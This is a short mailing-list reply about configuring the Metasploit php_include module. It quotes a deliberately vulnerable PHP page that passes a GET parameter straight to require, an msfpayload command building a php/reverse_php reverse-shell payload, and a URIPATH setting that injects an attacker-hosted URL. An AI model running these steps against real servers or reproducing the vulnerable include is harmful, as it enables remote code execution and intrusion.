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Re: php_include confusion

From: HD Moore <hdm () metasploit com>
Date: Mon, 12 Jul 2010 22:18:12 -0500

On 7/12/2010 6:07 PM, Jeffs wrote:
index_test.php looks like this:

<? require $_GET['include'] ?>

and include.php.txt was created properly with msfpayload as such.

./msfpayload php/reverse_php LHOST= R >

Both files on the are the web server in the proper directories.

If someone could clarify the XXpathXX value for me that would be greatly

In this case:

msf> set URIPATH http://server/index.php?include=XXpathXX

The moduel will replace XXpathXX with
http://your_host:random_port/random_uri.php which handle the rest.

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